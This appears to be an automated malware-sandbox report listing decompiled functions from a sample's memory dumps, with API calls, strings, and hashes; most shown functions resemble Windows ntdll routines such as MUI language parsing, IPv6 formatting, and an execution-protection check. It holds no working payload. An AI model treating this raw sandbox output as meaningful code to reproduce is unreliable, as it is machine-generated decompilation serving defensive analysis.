                                    Uniqueness Score: -1.00%

                                    Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                    • Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                    • Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                    • Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                    • Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 022D8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 94%
                                    			E022D8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E022D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E022BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E022D718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E022D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E022D718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E022D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E022D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E022D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E022D718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E022B2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E022CE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E022BE2A8(_t322,  &_v68, _v16);
								if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E022CE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E022BE2A8(_t322,  &_v68, _t236);
								if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E022D718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E022B2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E022CE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E022BE2A8(_v12,  &_v68, _v16);
							if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E022CE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E022BE2A8(_t322,  &_v68, _t269);
							if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E022D718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E022BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E022B2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E022CE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E022BE2A8(_v12,  &_v68, _v16);
						if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E022CE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E022BE2A8(_t322,  &_v68, _t296);
						if(E022D5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E022BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                    0x022d8788
                                    0x022d8788
                                    0x022d8791
                                    0x022d8794
                                    0x022d8798
                                    0x022d879b
                                    0x022d879e
                                    0x022d87a1
                                    0x022d87a4
                                    0x022d87a7
                                    0x022d87aa
                                    0x022d87af
                                    0x02321ad3
                                    0x022d8b0a
                                    0x022d8b0d
                                    0x022d8b13
                                    0x022d8b19
                                    0x022d8b1f
                                    0x022d8b25
                                    0x022d8b2b
                                    0x022d8b31
                                    0x022d8b37
                                    0x022d8b3d
                                    0x022d8b46
                                    0x022d8b46
                                    0x022d87c6
                                    0x022d87d0
                                    0x02321ae0
                                    0x02321ae6
                                    0x02321af8
                                    0x02321af8
                                    0x02321afd
                                    0x02321afe
                                    0x02321b01
                                    0x02321b06
                                    0x02321b06
                                    0x022d87d6
                                    0x022d87f2
                                    0x022d87f7
                                    0x022d8807
                                    0x022d880a
                                    0x022d880f
                                    0x022d8810
                                    0x022d8813
                                    0x022d8818
                                    0x022d8818
                                    0x022d882c
                                    0x022d8831
                                    0x022d8838
                                    0x022d8908
                                    0x022d8920
                                    0x022d89f0
                                    0x022d8a08
                                    0x022d8af6
                                    0x022d8af6
                                    0x022d8af8
                                    0x022d8afb
                                    0x02321beb
                                    0x02321beb
                                    0x022d8b04
                                    0x02321bf8
                                    0x02321c0e
                                    0x02321c13
                                    0x02321c16
                                    0x02321c16
                                    0x02321bf8
                                    0x00000000
                                    0x022d8b04
                                    0x022d8a0e
                                    0x022d8a11
                                    0x022d8a14
                                    0x022d8a15
                                    0x022d8a18
                                    0x022d8a22
                                    0x022d8b59
                                    0x022d8a28
                                    0x022d8a3c
                                    0x022d8a3c
                                    0x022d8a42
                                    0x02321bb0
                                    0x02321b11
                                    0x02321b11
                                    0x00000000
                                    0x022d8a48
                                    0x022d8a51
                                    0x022d8a5b
                                    0x022d8a5e
                                    0x022d8a61
                                    0x022d8a69
                                    0x022d8a69
                                    0x022d8a6d
                                    0x00000000
                                    0x00000000
                                    0x022d8a74
                                    0x022d8a7c
                                    0x022d8a7d
                                    0x022d8a91
                                    0x022d8a93
                                    0x022d8a93
                                    0x022d8a98
                                    0x022d8a9b
                                    0x022d8aa1
                                    0x022d8aa1
                                    0x022d8aa4
                                    0x022d8aaa
                                    0x022d8ab1
                                    0x022d8ac5
                                    0x022d8ac7
                                    0x022d8ac7
                                    0x022d8ac5
                                    0x022d8ace
                                    0x02321bc9
                                    0x02321bce
                                    0x02321bd2
                                    0x02321bd2
                                    0x022d8ad8
                                    0x022d8aeb
                                    0x022d8aeb
                                    0x022d8af0
                                    0x022d8af4
                                    0x00000000
                                    0x022d8af4
                                    0x022d8a42
                                    0x022d8926
                                    0x022d8929
                                    0x022d892c
                                    0x022d892d
                                    0x022d8930
                                    0x022d8935
                                    0x022d893a
                                    0x022d8b51
                                    0x022d8940
                                    0x022d8954
                                    0x022d8954
                                    0x022d895a
                                    0x02321b63
                                    0x00000000
                                    0x022d8960
                                    0x022d8969
                                    0x022d8973
                                    0x022d8976
                                    0x022d8979
                                    0x022d897e
                                    0x022d8981
                                    0x022d8981
                                    0x022d8986
                                    0x00000000
                                    0x00000000
                                    0x02321b6e
                                    0x02321b74
                                    0x02321b7b
                                    0x02321b8f
                                    0x02321b91
                                    0x02321b91
                                    0x02321b99
                                    0x02321b9c
                                    0x02321ba2
                                    0x02321ba2
                                    0x022d898c
                                    0x022d8992
                                    0x022d8999
                                    0x022d89ad
                                    0x02321ba8
                                    0x02321ba8
                                    0x022d89ad
                                    0x022d89b6
                                    0x022d89c8
                                    0x022d89cd
                                    0x022d89d0
                                    0x022d89d0
                                    0x022d89d6
                                    0x022d89e8
                                    0x022d89e8
                                    0x022d89ed
                                    0x00000000
                                    0x022d89ed
                                    0x022d895a
                                    0x022d883e
                                    0x022d8841
                                    0x022d8844
                                    0x022d8845
                                    0x022d8848
                                    0x022d884d
                                    0x022d8852
                                    0x022d8b49
                                    0x022d8858
                                    0x022d886c
                                    0x022d886c
                                    0x022d8872
                                    0x02321b0e
                                    0x00000000
                                    0x022d8878
                                    0x022d8881
                                    0x022d888b
                                    0x022d888e
                                    0x022d8891
                                    0x022d8896
                                    0x022d8899
                                    0x022d8899
                                    0x022d889e
                                    0x00000000
                                    0x00000000
                                    0x02321b21
                                    0x02321b27
                                    0x02321b2e
                                    0x02321b42
                                    0x02321b44
                                    0x02321b44
                                    0x02321b4c
                                    0x02321b4f
                                    0x02321b55
                                    0x02321b55
                                    0x022d88a4
                                    0x022d88aa
                                    0x022d88b1
                                    0x022d88c5
                                    0x02321b5b
                                    0x02321b5b
                                    0x022d88c5
                                    0x022d88ce
                                    0x022d88e0
                                    0x022d88e5
                                    0x022d88e8
                                    0x022d88e8
                                    0x022d88ee
                                    0x022d8900
                                    0x022d8900
                                    0x022d8905
                                    0x00000000
                                    0x022d8905

                                    APIs
                                    Strings
                                    • Kernel-MUI-Language-SKU, xrefs: 022D89FC
                                    • Kernel-MUI-Language-Allowed, xrefs: 022D8827
                                    • WindowsExcludedProcs, xrefs: 022D87C1
                                    • Kernel-MUI-Number-Allowed, xrefs: 022D87E6
                                    • Kernel-MUI-Language-Disallowed, xrefs: 022D8914
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcspbrk
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 402402107-258546922
                                    • Opcode ID: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                    • Instruction ID: e3517270dad52de74dbe7303274d5b02bd51e708b5607ac5eaf8aacef429fa02
                                    • Opcode Fuzzy Hash: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                    • Instruction Fuzzy Hash: 4FF1E3B2D20209EFDF11EFD8C9809EEBBB9BF08304F15446AE505A7215E734AA45DF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022F13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 38%
                                    			E022F13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E022E7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x22b2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E022E7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x22b9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E022E7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E022E7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E022E7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E022E7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                    0x022f13d5
                                    0x022f13d9
                                    0x022f13dc
                                    0x022f13de
                                    0x022f13e1
                                    0x022f13e8
                                    0x022f13ee
                                    0x0231e8fd
                                    0x00000000
                                    0x0231e921
                                    0x0231e921
                                    0x0231e928
                                    0x0231e982
                                    0x0231e98a
                                    0x00000000
                                    0x0231e99a
                                    0x0231e99e
                                    0x0231e9a3
                                    0x0231e9a8
                                    0x0231e9b9
                                    0x0231e978
                                    0x00000000
                                    0x0231e978
                                    0x0231e98a
                                    0x0231e92a
                                    0x0231e931
                                    0x0231e944
                                    0x0231e944
                                    0x0231e950
                                    0x0231e954
                                    0x0231e959
                                    0x0231e95e
                                    0x0231e963
                                    0x0231e970
                                    0x00000000
                                    0x0231e975
                                    0x0231e93b
                                    0x0231e980
                                    0x00000000
                                    0x0231e980
                                    0x0231e942
                                    0x0231e94b
                                    0x00000000
                                    0x0231e94b
                                    0x00000000
                                    0x0231e942
                                    0x022f13f4
                                    0x022f13f4
                                    0x022f13f9
                                    0x022f13fc
                                    0x022f13ff
                                    0x022f1406
                                    0x0231e9cc
                                    0x0231e9d2
                                    0x0231e9d2
                                    0x0231e9cc
                                    0x022f140c
                                    0x022f1411
                                    0x022f1431
                                    0x022f143a
                                    0x022f143c
                                    0x022f143f
                                    0x022f143f
                                    0x022f1442
                                    0x022f1447
                                    0x022f14a8
                                    0x022f14ac
                                    0x0231e9e2
                                    0x0231e9e7
                                    0x0231e9ec
                                    0x0231ea05
                                    0x0231ea05
                                    0x00000000
                                    0x022f1449
                                    0x00000000
                                    0x022f1449
                                    0x022f144c
                                    0x022f1459
                                    0x022f1462
                                    0x022f1469
                                    0x022f146a
                                    0x022f1470
                                    0x022f1473
                                    0x022f1476
                                    0x022f1476
                                    0x022f1490
                                    0x022f1495
                                    0x022f138e
                                    0x022f1390
                                    0x022f1397
                                    0x022f1398
                                    0x022f1399
                                    0x022f13a1
                                    0x022f13a4
                                    0x022f13a4
                                    0x022f1498
                                    0x022f149c
                                    0x022f149f
                                    0x022f14a2
                                    0x00000000
                                    0x00000000
                                    0x022f14a4
                                    0x00000000
                                    0x022f14a4
                                    0x022f1413
                                    0x022f1415
                                    0x022f1416
                                    0x022f1419
                                    0x022f141c
                                    0x022f1422
                                    0x022f13b7
                                    0x022f13bc
                                    0x022f13bf
                                    0x022f13bf
                                    0x022f13c2
                                    0x022f1424
                                    0x022f1424
                                    0x022f1424
                                    0x022f1427
                                    0x022f142b
                                    0x022f142c
                                    0x022f142c
                                    0x022f142c
                                    0x00000000
                                    0x022f141c
                                    0x022f1411

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: 721d309c38c64b4c50a2e44d922f046918a98c35e7d050a8379860a54d1e615c
                                    • Instruction ID: 8b601857761e457fc4eb3ef72046f88f1e63f76e8de5a691a5e3703e7ef5e3db
                                    • Opcode Fuzzy Hash: 721d309c38c64b4c50a2e44d922f046918a98c35e7d050a8379860a54d1e615c
                                    • Instruction Fuzzy Hash: A5612571920656EADF28DFD9C8908BEFBB5EFC4300B94C02DEA9A47548D375A650CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022E7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E022E7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2392088; // 0x777da72f
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E022E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02303F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E022BDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2394218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02303F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E022C0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02303F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E022C8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02303F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0232E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02303F92();
					_t38 = 1;
					L2:
					return E022BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                    0x022e7f08
                                    0x022e7f0f
                                    0x022e7f12
                                    0x022e7f1b
                                    0x022e7f31
                                    0x02303ead
                                    0x02303eb4
                                    0x00000000
                                    0x00000000
                                    0x02303eba
                                    0x02303ecd
                                    0x02303ed2
                                    0x02303ee1
                                    0x02303ee7
                                    0x02303eec
                                    0x02303f12
                                    0x02303f18
                                    0x02303f1a
                                    0x00000000
                                    0x00000000
                                    0x02303f20
                                    0x02303f26
                                    0x02303f28
                                    0x00000000
                                    0x00000000
                                    0x02303f2e
                                    0x02303f30
                                    0x00000000
                                    0x00000000
                                    0x02303f3a
                                    0x02303f3b
                                    0x02303f53
                                    0x02303f64
                                    0x02303f69
                                    0x02303f6c
                                    0x02303f6d
                                    0x02303f6f
                                    0x0230e304
                                    0x0230e30f
                                    0x0230e315
                                    0x0230e31e
                                    0x0230e321
                                    0x0230e327
                                    0x0230e329
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0230e32f
                                    0x0230e32f
                                    0x0230e337
                                    0x0230e33a
                                    0x0230e33b
                                    0x0230e33d
                                    0x0230e33f
                                    0x0230e341
                                    0x0230e341
                                    0x0230e34e
                                    0x0230e353
                                    0x0230e358
                                    0x0230e35d
                                    0x0230e35f
                                    0x00000000
                                    0x00000000
                                    0x0230e365
                                    0x0230e365
                                    0x0230e368
                                    0x0230e36e
                                    0x00000000
                                    0x00000000
                                    0x0230e374
                                    0x0230e32f
                                    0x02303f75
                                    0x02303f7a
                                    0x02303f7c
